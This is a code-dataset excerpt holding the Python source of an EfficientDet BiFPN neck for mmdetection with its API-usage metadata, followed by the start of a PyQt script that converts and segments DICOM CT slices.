"line_number": 102, "usage_type": "call"}, {"api_name": "service_catalog.models.JobTemplate", "line_number": 102, "usage_type": "argument"}, {"api_name": "django.urls.reverse", "line_number": 104, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 106, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 113, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.permission_required", "line_number": 99, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 117, "usage_type": "call"}, {"api_name": "service_catalog.models.TowerServer", "line_number": 117, "usage_type": "argument"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 118, "usage_type": "call"}, {"api_name": "service_catalog.models.JobTemplate", "line_number": 118, "usage_type": "argument"}, {"api_name": "django.urls.reverse", "line_number": 120, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 122, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 130, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.permission_required", "line_number": 115, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 135, "usage_type": "call"}, {"api_name": "service_catalog.models.TowerServer", "line_number": 135, "usage_type": "argument"}, {"api_name": "service_catalog.forms.TowerServerForm", "line_number": 136, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 139, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 141, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 145, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.permission_required", "line_number": 133, "usage_type": "call"}]} +{"seq_id": "126105061", "text": "import torch\nimport torch.nn as nn\nimport logging\nfrom collections import OrderedDict\nfrom typing import List, Optional\nfrom timm.models.efficientnet import *\nfrom timm import create_model\nfrom timm.models.layers import create_conv2d, drop_path, create_pool2d, Swish\nfrom ..registry import NECKS\n\n_DEBUG = False\n\n_ACT_LAYER = Swish\n\n\n\"\"\"EfficientDet Configurations\n\nAdapted from official impl at https://github.com/google/automl/tree/master/efficientdet\n\nTODO use a different config system, separate model from train specific hparams\n\"\"\"\n\nimport ast\nimport copy\nimport json\nimport six\n\n\ndef eval_str_fn(val):\n if val in {'true', 'false'}:\n return val == 'true'\n try:\n return ast.literal_eval(val)\n except ValueError:\n return val\n\n\n# pylint: disable=protected-access\nclass Config(object):\n \"\"\"A config utility class.\"\"\"\n\n def __init__(self, config_dict=None):\n self.update(config_dict)\n\n def __setattr__(self, k, v):\n self.__dict__[k] = Config(v) if isinstance(v, dict) else copy.deepcopy(v)\n\n def __getattr__(self, k):\n return self.__dict__[k]\n\n def __repr__(self):\n return repr(self.as_dict())\n\n def __str__(self):\n try:\n return json.dumps(self.as_dict(), indent=4)\n except TypeError:\n return str(self.as_dict())\n\n def _update(self, config_dict, allow_new_keys=True):\n \"\"\"Recursively update internal members.\"\"\"\n if not config_dict:\n return\n\n for k, v in six.iteritems(config_dict):\n if k not in self.__dict__.keys():\n if allow_new_keys:\n self.__setattr__(k, v)\n else:\n raise KeyError('Key `{}` does not exist for overriding. 
'.format(k))\n else:\n if isinstance(v, dict):\n self.__dict__[k]._update(v, allow_new_keys)\n else:\n self.__dict__[k] = copy.deepcopy(v)\n\n def get(self, k, default_value=None):\n return self.__dict__.get(k, default_value)\n\n def update(self, config_dict):\n \"\"\"Update members while allowing new keys.\"\"\"\n self._update(config_dict, allow_new_keys=True)\n\n def override(self, config_dict_or_str):\n \"\"\"Update members while disallowing new keys.\"\"\"\n if isinstance(config_dict_or_str, str):\n config_dict = self.parse_from_str(config_dict_or_str)\n elif isinstance(config_dict_or_str, dict):\n config_dict = config_dict_or_str\n else:\n raise ValueError('Unknown value type: {}'.format(config_dict_or_str))\n\n self._update(config_dict, allow_new_keys=False)\n\n def parse_from_str(self, config_str):\n \"\"\"parse from a string in format 'x=a,y=2' and return the dict.\"\"\"\n if not config_str:\n return {}\n config_dict = {}\n try:\n for kv_pair in config_str.split(','):\n if not kv_pair: # skip empty string\n continue\n k, v = kv_pair.split('=')\n config_dict[k.strip()] = eval_str_fn(v.strip())\n return config_dict\n except ValueError:\n raise ValueError('Invalid config_str: {}'.format(config_str))\n\n def as_dict(self):\n \"\"\"Returns a dict representation.\"\"\"\n config_dict = {}\n for k, v in six.iteritems(self.__dict__):\n if isinstance(v, Config):\n config_dict[k] = v.as_dict()\n else:\n config_dict[k] = copy.deepcopy(v)\n return config_dict\n\n\ndef default_detection_configs():\n \"\"\"Returns a default detection configs.\"\"\"\n h = Config()\n\n # model name.\n h.name = 'tf_efficientdet_d1'\n\n # input preprocessing parameters\n h.image_size = 640\n h.input_rand_hflip = True\n h.train_scale_min = 0.1\n h.train_scale_max = 2.0\n h.autoaugment_policy = None\n\n # dataset specific parameters\n h.num_classes = 90\n h.skip_crowd_during_training = True\n\n # model architecture\n h.min_level = 3\n h.max_level = 7\n h.num_levels = h.max_level - h.min_level + 1\n h.num_scales = 3\n h.aspect_ratios = [(1.0, 1.0), (1.4, 0.7), (0.7, 1.4)]\n h.anchor_scale = 4.0\n h.pad_type = 'same'\n\n # is batchnorm training mode\n h.is_training_bn = True\n\n # optimization\n h.momentum = 0.9\n h.learning_rate = 0.08\n h.lr_warmup_init = 0.008\n h.lr_warmup_epoch = 1.0\n h.first_lr_drop_epoch = 200.0\n h.second_lr_drop_epoch = 250.0\n h.clip_gradients_norm = 10.0\n h.num_epochs = 300\n\n # classification loss\n h.alpha = 0.25\n h.gamma = 1.5\n\n # localization loss\n h.delta = 0.1\n h.box_loss_weight = 50.0\n\n # regularization l2 loss.\n h.weight_decay = 4e-5\n\n # For detection.\n h.box_class_repeats = 3\n h.fpn_cell_repeats = 3\n h.fpn_channels = 88\n h.separable_conv = True\n h.apply_bn_for_resampling = True\n h.conv_after_downsample = False\n h.conv_bn_relu_pattern = False\n h.use_native_resize_op = False\n h.pooling_type = None\n\n # version.\n h.fpn_name = None\n h.fpn_config = None\n\n # No stochastic depth in default.\n h.survival_prob = None # FIXME remove\n h.drop_path_rate = 0.\n\n h.lr_decay_method = 'cosine'\n h.moving_average_decay = 0.9998\n h.ckpt_var_scope = None\n h.backbone_name = 'tf_efficientnet_b1'\n h.backbone_config = None\n\n # RetinaNet.\n h.resnet_depth = 50\n return h\n\n\nefficientdet_model_param_dict = {\n 'tf_efficientdet_d0':\n dict(\n name='efficientdet_d0',\n backbone_name='tf_efficientnet_b0',\n image_size=512,\n fpn_channels=64,\n fpn_cell_repeats=3,\n box_class_repeats=3,\n ),\n 'tf_efficientdet_d1':\n dict(\n name='efficientdet_d1',\n 
backbone_name='tf_efficientnet_b1',\n image_size=640,\n fpn_channels=88,\n fpn_cell_repeats=4,\n box_class_repeats=3,\n ),\n 'tf_efficientdet_d2':\n dict(\n name='efficientdet_d2',\n backbone_name='tf_efficientnet_b2',\n image_size=768,\n fpn_channels=112,\n fpn_cell_repeats=5,\n box_class_repeats=3,\n ),\n 'tf_efficientdet_d3':\n dict(\n name='efficientdet_d3',\n backbone_name='tf_efficientnet_b3',\n image_size=896,\n fpn_channels=160,\n fpn_cell_repeats=6,\n box_class_repeats=4,\n ),\n 'tf_efficientdet_d4':\n dict(\n name='efficientdet_d4',\n backbone_name='tf_efficientnet_b4',\n image_size=1024,\n fpn_channels=224,\n fpn_cell_repeats=7,\n box_class_repeats=4,\n ),\n 'tf_efficientdet_d5':\n dict(\n name='efficientdet_d5',\n backbone_name='tf_efficientnet_b5',\n image_size=1280,\n fpn_channels=288,\n fpn_cell_repeats=7,\n box_class_repeats=4,\n ),\n 'tf_efficientdet_d6':\n dict(\n name='efficientdet_d6',\n backbone_name='tf_efficientnet_b6',\n image_size=1280,\n fpn_channels=384,\n fpn_cell_repeats=8,\n box_class_repeats=5,\n fpn_name='bifpn_sum', # Use unweighted sum for training stability.\n ),\n 'tf_efficientdet_d7':\n dict(\n name='efficientdet_d7',\n backbone_name='tf_efficientnet_b6',\n image_size=1536,\n fpn_channels=384,\n fpn_cell_repeats=8,\n box_class_repeats=5,\n anchor_scale=5.0,\n fpn_name='bifpn_sum', # Use unweighted sum for training stability.\n ),\n}\n\n\ndef get_efficientdet_config(model_name='efficientdet_d1'):\n \"\"\"Get the default config for EfficientDet based on model name.\"\"\"\n h = default_detection_configs()\n h.override(efficientdet_model_param_dict[model_name])\n return h\n\n\nclass SequentialAppend(nn.Sequential):\n def __init__(self, *args):\n super(SequentialAppend, self).__init__(*args)\n\n def forward(self, x: List[torch.Tensor]):\n for module in self:\n x.append(module(x))\n return x\n\n\nclass SequentialAppendLast(nn.Sequential):\n def __init__(self, *args):\n super(SequentialAppendLast, self).__init__(*args)\n\n def forward(self, x: List[torch.Tensor]):\n for module in self:\n x.append(module(x[-1]))\n return x\n\n\nclass ConvBnAct2d(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, stride=1, dilation=1, padding='', bias=False,\n norm_layer=nn.BatchNorm2d, norm_kwargs=None, act_layer=_ACT_LAYER):\n super(ConvBnAct2d, self).__init__()\n norm_kwargs = norm_kwargs or {}\n self.conv = create_conv2d(\n in_channels, out_channels, kernel_size, stride=stride, dilation=dilation, padding=padding, bias=bias)\n self.bn = None if norm_layer is None else norm_layer(out_channels, **norm_kwargs)\n self.act = None if act_layer is None else act_layer(inplace=True)\n\n def forward(self, x):\n x = self.conv(x)\n if self.bn is not None:\n x = self.bn(x)\n if self.act is not None:\n x = self.act(x)\n return x\n\n\nclass SeparableConv2d(nn.Module):\n \"\"\" Separable Conv\n \"\"\"\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, dilation=1, padding='', bias=False,\n channel_multiplier=1.0, pw_kernel_size=1, act_layer=_ACT_LAYER,\n norm_layer=nn.BatchNorm2d, norm_kwargs=None):\n super(SeparableConv2d, self).__init__()\n norm_kwargs = norm_kwargs or {}\n\n self.conv_dw = create_conv2d(\n in_channels, int(in_channels * channel_multiplier), kernel_size,\n stride=stride, dilation=dilation, padding=padding, depthwise=True)\n\n self.conv_pw = create_conv2d(\n int(in_channels * channel_multiplier), out_channels, pw_kernel_size, padding=padding, bias=bias)\n\n self.bn = None if norm_layer is None else norm_layer(out_channels, 
**norm_kwargs)\n self.act = None if act_layer is None else act_layer(inplace=True)\n\n def forward(self, x):\n x = self.conv_dw(x)\n x = self.conv_pw(x)\n if self.bn is not None:\n x = self.bn(x)\n if self.act is not None:\n x = self.act(x)\n return x\n\n\nclass ResampleFeatureMap(nn.Sequential):\n\n def __init__(self, in_channels, out_channels, reduction_ratio=1., pad_type='', pooling_type='max',\n norm_layer=nn.BatchNorm2d, norm_kwargs=None, conv_after_downsample=False, apply_bn=False):\n super(ResampleFeatureMap, self).__init__()\n pooling_type = pooling_type or 'max'\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.reduction_ratio = reduction_ratio\n self.conv_after_downsample = conv_after_downsample\n\n conv = None\n if in_channels != out_channels:\n conv = ConvBnAct2d(\n in_channels, out_channels, kernel_size=1, padding=pad_type,\n norm_layer=norm_layer if apply_bn else None, norm_kwargs=norm_kwargs, bias=True, act_layer=None)\n\n if reduction_ratio > 1:\n stride_size = int(reduction_ratio)\n if conv is not None and not self.conv_after_downsample:\n self.add_module('conv', conv)\n self.add_module(\n 'downsample',\n create_pool2d(\n pooling_type, kernel_size=stride_size + 1, stride=stride_size, padding=pad_type))\n if conv is not None and self.conv_after_downsample:\n self.add_module('conv', conv)\n else:\n if conv is not None:\n self.add_module('conv', conv)\n if reduction_ratio < 1:\n scale = int(1 // reduction_ratio)\n self.add_module('upsample', nn.UpsamplingNearest2d(scale_factor=scale))\n\n # def forward(self, x):\n # # here for debugging only\n # assert x.shape[1] == self.in_channels\n # if self.reduction_ratio > 1:\n # if hasattr(self, 'conv') and not self.conv_after_downsample:\n # x = self.conv(x)\n # x = self.downsample(x)\n # if hasattr(self, 'conv') and self.conv_after_downsample:\n # x = self.conv(x)\n # else:\n # if hasattr(self, 'conv'):\n # x = self.conv(x)\n # if self.reduction_ratio < 1:\n # x = self.upsample(x)\n # return x\n\n\nclass FPNCombine(nn.Module):\n def __init__(self, feature_info, fpn_config, fpn_channels, inputs_offsets, target_reduction, pad_type='',\n pooling_type='max', norm_layer=nn.BatchNorm2d, norm_kwargs=None,\n apply_bn_for_resampling=False, conv_after_downsample=False, weight_method='attn'):\n super(FPNCombine, self).__init__()\n self.inputs_offsets = inputs_offsets\n self.weight_method = weight_method\n\n self.resample = nn.ModuleDict()\n for idx, offset in enumerate(inputs_offsets):\n in_channels = fpn_channels\n if offset < len(feature_info):\n in_channels = feature_info[offset]['num_chs']\n input_reduction = feature_info[offset]['reduction']\n else:\n node_idx = offset - len(feature_info)\n input_reduction = fpn_config.nodes[node_idx]['reduction']\n reduction_ratio = target_reduction / input_reduction\n self.resample[str(offset)] = ResampleFeatureMap(\n in_channels, fpn_channels, reduction_ratio=reduction_ratio, pad_type=pad_type,\n pooling_type=pooling_type, norm_layer=norm_layer, norm_kwargs=norm_kwargs,\n apply_bn=apply_bn_for_resampling, conv_after_downsample=conv_after_downsample)\n\n if weight_method == 'attn' or weight_method == 'fastattn':\n # WSM\n self.edge_weights = nn.Parameter(torch.ones(len(inputs_offsets)), requires_grad=True)\n else:\n self.edge_weights = None\n\n def forward(self, x):\n dtype = x[0].dtype\n nodes = []\n for offset in self.inputs_offsets:\n input_node = x[offset]\n input_node = self.resample[str(offset)](input_node)\n nodes.append(input_node)\n\n if self.weight_method == 'attn':\n 
normalized_weights = torch.softmax(self.edge_weights.type(dtype), dim=0)\n x = torch.stack(nodes, dim=-1) * normalized_weights\n elif self.weight_method == 'fastattn':\n edge_weights = nn.functional.relu(self.edge_weights.type(dtype))\n weights_sum = torch.sum(edge_weights)\n x = torch.stack(\n [(nodes[i] * edge_weights[i]) / (weights_sum + 0.0001) for i in range(len(nodes))], dim=-1)\n elif self.weight_method == 'sum':\n x = torch.stack(nodes, dim=-1)\n else:\n raise ValueError('unknown weight_method {}'.format(self.weight_method))\n x = torch.sum(x, dim=-1)\n return x\n\n\nclass BiFPNLayer(nn.Module):\n def __init__(self, feature_info, fpn_config, fpn_channels, num_levels=5, pad_type='',\n pooling_type='max', norm_layer=nn.BatchNorm2d, norm_kwargs=None, act_layer=_ACT_LAYER,\n apply_bn_for_resampling=False, conv_after_downsample=True, conv_bn_relu_pattern=False,\n separable_conv=True):\n super(BiFPNLayer, self).__init__()\n self.fpn_config = fpn_config\n self.num_levels = num_levels\n self.conv_bn_relu_pattern = False\n\n self.feature_info = []\n self.fnode = SequentialAppend()\n for i, fnode_cfg in enumerate(fpn_config.nodes):\n logging.debug('fnode {} : {}'.format(i, fnode_cfg))\n fnode_layers = OrderedDict()\n\n # combine features\n reduction = fnode_cfg['reduction']\n fnode_layers['combine'] = FPNCombine(\n feature_info, fpn_config, fpn_channels, fnode_cfg['inputs_offsets'], target_reduction=reduction,\n pad_type=pad_type, pooling_type=pooling_type, norm_layer=norm_layer, norm_kwargs=norm_kwargs,\n apply_bn_for_resampling=apply_bn_for_resampling, conv_after_downsample=conv_after_downsample,\n weight_method=fpn_config.weight_method)\n self.feature_info.append(dict(num_chs=fpn_channels, reduction=reduction))\n\n # after combine ops\n after_combine = OrderedDict()\n if not conv_bn_relu_pattern:\n after_combine['act'] = act_layer(inplace=True)\n conv_bias = True\n conv_act = None\n else:\n conv_bias = False\n conv_act = act_layer\n conv_kwargs = dict(\n in_channels=fpn_channels, out_channels=fpn_channels, kernel_size=3, padding=pad_type,\n bias=conv_bias, norm_layer=norm_layer, norm_kwargs=norm_kwargs, act_layer=conv_act)\n after_combine['conv'] = SeparableConv2d(**conv_kwargs) if separable_conv else ConvBnAct2d(**conv_kwargs)\n fnode_layers['after_combine'] = nn.Sequential(after_combine)\n\n self.fnode.add_module(str(i), nn.Sequential(fnode_layers))\n\n self.feature_info = self.feature_info[-num_levels::]\n\n def forward(self, x):\n x = self.fnode(x)\n return x[-self.num_levels::]\n\n\ndef bifpn_sum_config(base_reduction=8):\n \"\"\"BiFPN config with sum.\"\"\"\n p = Config()\n p.nodes = [\n {'reduction': base_reduction << 3, 'inputs_offsets': [3, 4]},\n {'reduction': base_reduction << 2, 'inputs_offsets': [2, 5]},\n {'reduction': base_reduction << 1, 'inputs_offsets': [1, 6]},\n {'reduction': base_reduction, 'inputs_offsets': [0, 7]},\n {'reduction': base_reduction << 1, 'inputs_offsets': [1, 7, 8]},\n {'reduction': base_reduction << 2, 'inputs_offsets': [2, 6, 9]},\n {'reduction': base_reduction << 3, 'inputs_offsets': [3, 5, 10]},\n {'reduction': base_reduction << 4, 'inputs_offsets': [4, 11]},\n ]\n p.weight_method = 'sum'\n return p\n\n\ndef bifpn_attn_config():\n \"\"\"BiFPN config with fast weighted sum.\"\"\"\n p = bifpn_sum_config()\n p.weight_method = 'attn'\n return p\n\n\ndef bifpn_fa_config():\n \"\"\"BiFPN config with fast weighted sum.\"\"\"\n p = bifpn_sum_config()\n p.weight_method = 'fastattn'\n return p\n\n\ndef get_fpn_config(fpn_name):\n if not fpn_name:\n fpn_name 
= 'bifpn_fa'\n name_to_config = {\n 'bifpn_sum': bifpn_sum_config(),\n 'bifpn_attn': bifpn_attn_config(),\n 'bifpn_fa': bifpn_fa_config(),\n }\n return name_to_config[fpn_name]\n\n\n@NECKS.register_module\nclass BiFPN(nn.Module):\n\n def __init__(self, name, norm_layer=nn.BatchNorm2d, norm_kwargs=None, act_layer=_ACT_LAYER):\n super(BiFPN, self).__init__()\n config = get_efficientdet_config(name)\n backbone_name = name.replace('det_d', 'net_b')\n self.config = config\n fpn_config = config.fpn_config or get_fpn_config(config.fpn_name)\n backbone = eval(backbone_name)(features_only=True, out_indices=(2,3,4))\n feature_info = [dict(num_chs=f['num_chs'], reduction=f['reduction'])\n for i, f in enumerate(backbone.feature_info())]\n del backbone\n self.resample = SequentialAppendLast()\n for level in range(config.num_levels):\n if level < len(feature_info):\n in_chs = feature_info[level]['num_chs']\n reduction = feature_info[level]['reduction']\n else:\n # Adds a coarser level by downsampling the last feature map\n reduction_ratio = 2\n self.resample.add_module(str(level), ResampleFeatureMap(\n in_channels=in_chs,\n out_channels=config.fpn_channels,\n pad_type=config.pad_type,\n pooling_type=config.pooling_type,\n norm_layer=norm_layer,\n norm_kwargs=norm_kwargs,\n reduction_ratio=reduction_ratio,\n apply_bn=config.apply_bn_for_resampling,\n conv_after_downsample=config.conv_after_downsample,\n ))\n in_chs = config.fpn_channels\n reduction = int(reduction * reduction_ratio)\n feature_info.append(dict(num_chs=in_chs, reduction=reduction))\n\n self.cell = nn.Sequential()\n for rep in range(config.fpn_cell_repeats):\n logging.debug('building cell {}'.format(rep))\n fpn_layer = BiFPNLayer(\n feature_info=feature_info,\n fpn_config=fpn_config,\n fpn_channels=config.fpn_channels,\n num_levels=config.num_levels,\n pad_type=config.pad_type,\n pooling_type=config.pooling_type,\n norm_layer=norm_layer,\n norm_kwargs=norm_kwargs,\n act_layer=act_layer,\n separable_conv=config.separable_conv,\n apply_bn_for_resampling=config.apply_bn_for_resampling,\n conv_after_downsample=config.conv_after_downsample,\n conv_bn_relu_pattern=config.conv_bn_relu_pattern\n )\n self.cell.add_module(str(rep), fpn_layer)\n feature_info = fpn_layer.feature_info\n\n # FIXME init weights for training\n\n def forward(self, x):\n assert len(self.resample) == self.config.num_levels - len(x)\n x = self.resample(x)\n x = self.cell(x)\n return x\n\n\n def init_weights(self, pretrained=None):\n pass", "sub_path": "mmdet/models/necks/bifpn.py", "file_name": "bifpn.py", "file_ext": "py", "file_size_in_byte": 21758, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "timm.models.layers.Swish", "line_number": 13, "usage_type": "name"}, {"api_name": "ast.literal_eval", "line_number": 33, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 46, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 56, "usage_type": "call"}, {"api_name": "six.iteritems", "line_number": 65, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 75, "usage_type": "call"}, {"api_name": "six.iteritems", "line_number": 113, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 288, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 288, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 292, "usage_type": "name"}, {"api_name": 
"torch.Tensor", "line_number": 292, "usage_type": "attribute"}, {"api_name": "torch.nn.Sequential", "line_number": 298, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 298, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 302, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 302, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 308, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 308, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 310, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 310, "usage_type": "name"}, {"api_name": "timm.models.layers.create_conv2d", "line_number": 313, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 327, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 327, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 332, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 332, "usage_type": "name"}, {"api_name": "timm.models.layers.create_conv2d", "line_number": 336, "usage_type": "call"}, {"api_name": "timm.models.layers.create_conv2d", "line_number": 340, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 356, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 356, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 359, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 359, "usage_type": "name"}, {"api_name": "timm.models.layers.create_pool2d", "line_number": 379, "usage_type": "call"}, {"api_name": "torch.nn.UpsamplingNearest2d", "line_number": 388, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 388, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 407, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 407, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 409, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 409, "usage_type": "name"}, {"api_name": "torch.nn.ModuleDict", "line_number": 415, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 415, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 432, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 432, "usage_type": "name"}, {"api_name": "torch.ones", "line_number": 432, "usage_type": "call"}, {"api_name": "torch.softmax", "line_number": 445, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 446, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 448, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 448, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 448, "usage_type": "name"}, {"api_name": "torch.sum", "line_number": 449, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 450, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 453, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 456, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 460, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 460, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 462, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 462, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 473, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 474, 
"usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 486, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 498, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 498, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 500, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 500, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 552, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 552, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 554, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 554, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 587, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 587, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 589, "usage_type": "call"}, {"api_name": "registry.NECKS.register_module", "line_number": 551, "usage_type": "attribute"}, {"api_name": "registry.NECKS", "line_number": 551, "usage_type": "name"}]} +{"seq_id": "154009849", "text": "import sys\r\nimport pydicom\r\n#import scipy.misc\r\nimport os\r\nimport cv2\r\nimport numpy as np\r\nimport skimage\r\n#import matplotlib.pyplot as plt\r\nimport warnings\r\nimport threading\r\n#import mritopng\r\nimport re\r\nimport time\r\nimport shutil\r\nfrom PyQt5.QtWidgets import QDialog, QApplication\r\nfrom PyQt5.QtWidgets import QFileDialog\r\nfrom PyQt5.QtGui import QPixmap,QImage\r\nfrom MainUI import MainUI_Dialog,Multi_Dialog,Reveal_Dialog\r\nfrom skimage import morphology\r\nfrom numba import jit \r\nimport datetime\r\n\r\n\r\nInitialization = False\r\n\r\ndef sorted_aphanumeric(data):\r\n convert = lambda text: int(text) if text.isdigit() else text.lower()\r\n alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ] \r\n return sorted(data, key=alphanum_key)\r\n\r\ndef SaveLogs(txt):\r\n now = datetime.datetime.now()\r\n string = \"Logs/\"+str(now.year)+\"-\"+str(now.month)+\"-\"+str(now.day)+\"#\"+str(now.hour)+str(now.minute)+\".txt\"\r\n fp = open(string, \"a\")\r\n fp.write(txt)\r\n fp.close()\r\n\r\nclass Dicom():\r\n def __init__(self):\r\n self.index = 0\r\n self.save_index = -1\r\n self.bottom_index = -1\r\n self.top_index = -1\r\n self.BoneValue = 210 #Best:210\r\n self.LiverValue = 178 #Best:178 FROM MIDDLE IN DATASET\r\n self.dpath = \"Dicoms\"\r\n self.rpath = \"Registers\"\r\n self.LoopProcess = False\r\n self.dfiles = sorted_aphanumeric(os.listdir(self.dpath))\r\n self.rfiles = sorted_aphanumeric(os.listdir(self.rpath))\r\n self.len = len(self.rfiles)\r\n self.Dicom2jpg(self.index)\r\n self.afreaVol = 0\r\n self.setArea = 0\r\n self.setSliceLocations = []\r\n self.setImagePositon_z = []\r\n print(\"Index:\"+str(self.index))\r\n \r\n # if you need to convert to image file from dicom, use this function. 
\r\n def Dicom2jpg(self,value):\r\n self.index = value\r\n self.rpath = \"Registers/\" + self.rfiles[self.index]\r\n self.Image = cv2.imread(self.rpath,0)\r\n self.TargetImage = cv2.imread(self.rpath,0)\r\n self.ReturnImage = cv2.imread(self.rpath,0)\r\n if os.path.isfile(self.rpath):\r\n pass\r\n else:\r\n self.fullpath = os.path.join(self.dpath, self.dfiles[self.index])\r\n path = os.getcwd()\r\n os.system(\"cd \"+ path)\r\n #ds = pydicom.read_file(self.fullpath)\r\n #img = ds.pixel_array\r\n \r\n outpath = \"Registers\"\r\n cmd = 'dcm2jpg -o ' + os.path.abspath(outpath) + ' ' + os.path.abspath(self.fullpath)\r\n os.system(cmd)\r\n #scaled_img = cv2.convertScaleAbs(img-np.min(img), alpha=(255.0 / min(np.max(img)-np.min(img), 10000)))\r\n #with warnings.catch_warnings():\r\n # warnings.simplefilter(\"ignore\")\r\n # scipy.misc.imsave(self.rpath,img)\r\n #cv2.imwrite(self.rpath,scaled_img) # write png image\r\n self.Image = cv2.imread(self.rpath,0)\r\n self.TargetImage = cv2.imread(self.rpath,0)\r\n\r\n \r\n def CreateTempImage(self):\r\n win.SetPixmap()\r\n \r\n def MedianBlurImage(self,img):\r\n img = cv2.medianBlur(img, 5) \r\n #print(\"MedianBlurImage\")\r\n return img\r\n \r\n def BinaryImage(self,img,value):\r\n ret,img = cv2.threshold(img, value, 255, cv2.THRESH_BINARY)\r\n #print(\"BinaryImage\")\r\n return img\r\n \r\n def OtsuImage(self,img):\r\n ret,img = cv2.threshold(img, 0, 255, cv2.THRESH_OTSU)\r\n #print(\"OtsuImage\")\r\n return img\r\n\r\n def DilateImage(self,img):\r\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT,(5, 5)) \r\n img = cv2.dilate(img, kernel) \r\n #print(\"DilateImage\")\r\n return img\r\n\r\n def ClearTheBone(self,img):\r\n original = self.Image\r\n for i in range(0,img.shape[0]):\r\n for j in range(0,img.shape[1]):\r\n if(img[i,j] != 0): \r\n original[i,j] = 0; \r\n \r\n self.Image = cv2.imread(self.rpath,0)\r\n img = original\r\n #print(\"ClearTheBone\")\r\n return img\r\n \r\n def CloseImage(self,img,value):\r\n kernel = np.ones((value,value), np.uint8)\r\n img = cv2.morphologyEx(img,cv2.MORPH_CLOSE,kernel)\r\n #print(\"CloseImage\")\r\n return img\r\n \r\n def MeasureLabel(self,img):\r\n labels=skimage.measure.label(self.TargetImage,connectivity=2) \r\n cv2.imshow(\"test\",self.TargetImage)\r\n regions = skimage.measure.regionprops(labels)\r\n self.MaxLabel = []\r\n for i in range(labels.max()):\r\n self.MaxLabel.append(regions[i]['area'])\r\n self.MaxLabel.sort(reverse=True)\r\n skimage.morphology.remove_small_objects(labels, min_size=self.MaxLabel[0], connectivity=2, in_place=True)\r\n with warnings.catch_warnings():\r\n warnings.simplefilter(\"ignore\")\r\n cv_image = skimage.img_as_ubyte(labels)\r\n \r\n img = cv_image\r\n #print(\"MeasureLabel\")\r\n return img\r\n \r\n def CannyImage(self,img):\r\n canny = cv2.Canny(img, 